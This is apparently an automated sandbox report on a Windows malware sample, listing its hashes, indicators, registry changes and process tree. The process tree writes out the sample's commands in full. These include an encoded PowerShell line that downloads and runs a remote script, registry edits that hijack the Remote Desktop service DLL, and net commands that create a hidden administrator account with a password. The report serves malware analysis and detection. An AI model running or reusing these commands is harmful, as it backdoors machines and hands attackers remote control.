Analysis
-
max time kernel
125s -
max time network
124s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
12-11-2020 14:16
Static task
static1
Behavioral task
behavioral1
Sample
689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
Resource
win10v20201028
General
-
Target
689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
-
Size
3.4MB
-
MD5
a8d7894060ed9e3a80de995fcbf81864
-
SHA1
8ed59a83db92328d05ec05af58f2b4e259be3af4
-
SHA256
689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98
-
SHA512
5e66992066cf9e0a698cf1271068a5c73aa0f8769b4b712317e528b8da83ca1780a730e72e19c4c20358b351e44692bfb6a957a0e782873063597baa3d97fa59
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 20 4072 powershell.exe 22 4072 powershell.exe 23 4072 powershell.exe 24 4072 powershell.exe 26 4072 powershell.exe 28 4072 powershell.exe 30 4072 powershell.exe 32 4072 powershell.exe 34 4072 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 3156 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 2244 2244 -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_uw1kamk1.zal.ps1 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2DA8.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2E94.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2ED3.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_px2vwxh5.fir.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2EF3.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2F04.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Modifies data under HKEY_USERS 217 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepid process 3156 powershell.exe 3156 powershell.exe 3156 powershell.exe 3156 powershell.exe 3156 powershell.exe 3156 powershell.exe 4072 powershell.exe 4072 powershell.exe 4072 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious use of AdjustPrivilegeToken 77 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3156 powershell.exe Token: SeIncreaseQuotaPrivilege 3156 powershell.exe Token: SeSecurityPrivilege 3156 powershell.exe Token: SeTakeOwnershipPrivilege 3156 powershell.exe Token: SeLoadDriverPrivilege 3156 powershell.exe Token: SeSystemProfilePrivilege 3156 powershell.exe Token: SeSystemtimePrivilege 3156 powershell.exe Token: SeProfSingleProcessPrivilege 3156 powershell.exe Token: SeIncBasePriorityPrivilege 3156 powershell.exe Token: SeCreatePagefilePrivilege 3156 powershell.exe Token: SeBackupPrivilege 3156 powershell.exe Token: SeRestorePrivilege 3156 powershell.exe Token: SeShutdownPrivilege 3156 powershell.exe Token: SeDebugPrivilege 3156 powershell.exe Token: SeSystemEnvironmentPrivilege 3156 powershell.exe Token: SeRemoteShutdownPrivilege 3156 powershell.exe Token: SeUndockPrivilege 3156 powershell.exe Token: SeManageVolumePrivilege 3156 powershell.exe Token: 33 3156 powershell.exe Token: 34 3156 powershell.exe Token: 35 3156 powershell.exe Token: 36 3156 powershell.exe Token: SeIncreaseQuotaPrivilege 3156 powershell.exe Token: SeSecurityPrivilege 3156 powershell.exe Token: SeTakeOwnershipPrivilege 3156 powershell.exe Token: SeLoadDriverPrivilege 3156 powershell.exe Token: SeSystemProfilePrivilege 3156 powershell.exe Token: SeSystemtimePrivilege 3156 powershell.exe Token: SeProfSingleProcessPrivilege 3156 powershell.exe Token: SeIncBasePriorityPrivilege 3156 powershell.exe Token: SeCreatePagefilePrivilege 3156 powershell.exe Token: SeBackupPrivilege 3156 powershell.exe Token: SeRestorePrivilege 3156 powershell.exe Token: SeShutdownPrivilege 3156 powershell.exe Token: SeDebugPrivilege 3156 powershell.exe Token: SeSystemEnvironmentPrivilege 3156 powershell.exe Token: SeRemoteShutdownPrivilege 3156 powershell.exe Token: SeUndockPrivilege 3156 powershell.exe Token: SeManageVolumePrivilege 3156 powershell.exe Token: 33 3156 powershell.exe Token: 34 3156 powershell.exe Token: 35 3156 powershell.exe Token: 36 3156 powershell.exe Token: SeIncreaseQuotaPrivilege 3156 powershell.exe Token: SeSecurityPrivilege 3156 powershell.exe Token: SeTakeOwnershipPrivilege 3156 powershell.exe Token: SeLoadDriverPrivilege 3156 powershell.exe Token: SeSystemProfilePrivilege 3156 powershell.exe Token: SeSystemtimePrivilege 3156 powershell.exe Token: SeProfSingleProcessPrivilege 3156 powershell.exe Token: SeIncBasePriorityPrivilege 3156 powershell.exe Token: SeCreatePagefilePrivilege 3156 powershell.exe Token: SeBackupPrivilege 3156 powershell.exe Token: SeRestorePrivilege 3156 powershell.exe Token: SeShutdownPrivilege 3156 powershell.exe Token: SeDebugPrivilege 3156 powershell.exe Token: SeSystemEnvironmentPrivilege 3156 powershell.exe Token: SeRemoteShutdownPrivilege 3156 powershell.exe Token: SeUndockPrivilege 3156 powershell.exe Token: SeManageVolumePrivilege 3156 powershell.exe Token: 33 3156 powershell.exe Token: 34 3156 powershell.exe Token: 35 3156 powershell.exe Token: 36 3156 powershell.exe -
Suspicious use of WriteProcessMemory 68 IoCs
Processes:
689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.execmd.execmd.exedescription pid process target process PID 984 wrote to memory of 3156 984 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe powershell.exe PID 984 wrote to memory of 3156 984 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe powershell.exe PID 3156 wrote to memory of 2424 3156 powershell.exe csc.exe PID 3156 wrote to memory of 2424 3156 powershell.exe csc.exe PID 2424 wrote to memory of 4088 2424 csc.exe cvtres.exe PID 2424 wrote to memory of 4088 2424 csc.exe cvtres.exe PID 3156 wrote to memory of 3808 3156 powershell.exe reg.exe PID 3156 wrote to memory of 3808 3156 powershell.exe reg.exe PID 3156 wrote to memory of 3984 3156 powershell.exe reg.exe PID 3156 wrote to memory of 3984 3156 powershell.exe reg.exe PID 3156 wrote to memory of 1416 3156 powershell.exe reg.exe PID 3156 wrote to memory of 1416 3156 powershell.exe reg.exe PID 3156 wrote to memory of 2152 3156 powershell.exe net.exe PID 3156 wrote to memory of 2152 3156 powershell.exe net.exe PID 2152 wrote to memory of 2148 2152 net.exe net1.exe PID 2152 wrote to memory of 2148 2152 net.exe net1.exe PID 3156 wrote to memory of 1592 3156 powershell.exe cmd.exe PID 3156 wrote to memory of 1592 3156 powershell.exe cmd.exe PID 1592 wrote to memory of 3076 1592 cmd.exe cmd.exe PID 1592 wrote to memory of 3076 1592 cmd.exe cmd.exe PID 3076 wrote to memory of 3796 3076 cmd.exe net.exe PID 3076 wrote to memory of 3796 3076 cmd.exe net.exe PID 3796 wrote to memory of 3500 3796 net.exe net1.exe PID 3796 wrote to memory of 3500 3796 net.exe net1.exe PID 3156 wrote to memory of 2284 3156 powershell.exe cmd.exe PID 3156 wrote to memory of 2284 3156 powershell.exe cmd.exe PID 2284 wrote to memory of 896 2284 cmd.exe cmd.exe PID 2284 wrote to memory of 896 2284 cmd.exe cmd.exe PID 896 wrote to memory of 928 896 cmd.exe net.exe PID 896 wrote to memory of 928 896 cmd.exe net.exe PID 928 wrote to memory of 1332 928 net.exe net1.exe PID 928 wrote to memory of 1332 928 net.exe net1.exe PID 476 wrote to memory of 3996 476 cmd.exe net.exe PID 476 wrote to memory of 3996 476 cmd.exe net.exe PID 3996 wrote to memory of 212 3996 net.exe net1.exe PID 3996 wrote to memory of 212 3996 net.exe net1.exe PID 2124 wrote to memory of 1728 2124 cmd.exe net.exe PID 2124 wrote to memory of 1728 2124 cmd.exe net.exe PID 1728 wrote to memory of 3116 1728 net.exe net1.exe PID 1728 wrote to memory of 3116 1728 net.exe net1.exe PID 1036 wrote to memory of 3924 1036 cmd.exe net.exe PID 1036 wrote to memory of 3924 1036 cmd.exe net.exe PID 3924 wrote to memory of 2200 3924 net.exe net1.exe PID 3924 wrote to memory of 2200 3924 net.exe net1.exe PID 1752 wrote to memory of 3512 1752 cmd.exe net.exe PID 1752 wrote to memory of 3512 1752 cmd.exe net.exe PID 3512 wrote to memory of 3944 3512 net.exe net1.exe PID 3512 wrote to memory of 3944 3512 net.exe net1.exe PID 3796 wrote to memory of 3296 3796 cmd.exe net.exe PID 3796 wrote to memory of 3296 3796 cmd.exe net.exe PID 3296 wrote to memory of 2560 3296 net.exe net1.exe PID 3296 wrote to memory of 2560 3296 net.exe net1.exe PID 1960 wrote to memory of 4032 1960 cmd.exe net.exe PID 1960 wrote to memory of 4032 1960 cmd.exe net.exe PID 4032 wrote to memory of 3776 4032 net.exe net1.exe PID 4032 wrote to memory of 3776 4032 net.exe net1.exe PID 812 wrote to memory of 1440 812 cmd.exe WMIC.exe PID 812 wrote to memory of 1440 812 cmd.exe WMIC.exe PID 3820 wrote to memory of 512 3820 cmd.exe WMIC.exe PID 3820 wrote to memory of 512 3820 cmd.exe WMIC.exe PID 2312 wrote to memory of 2152 2312 cmd.exe cmd.exe PID 2312 wrote to memory of 2152 2312 cmd.exe cmd.exe PID 2152 wrote to memory of 4072 2152 cmd.exe powershell.exe PID 2152 wrote to memory of 4072 2152 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe"C:\Users\Admin\AppData\Local\Temp\689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hvjt0zup\hvjt0zup.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABE5.tmp" "c:\Users\Admin\AppData\Local\Temp\hvjt0zup\CSC6AEF796A864D438BCECA6AB8CF2FC.TMP"4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin a7ZkH15H /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin a7ZkH15H /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin a7ZkH15H /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin a7ZkH15H1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin a7ZkH15H2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin a7ZkH15H3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
- Suspicious use of WriteProcessMemory
-
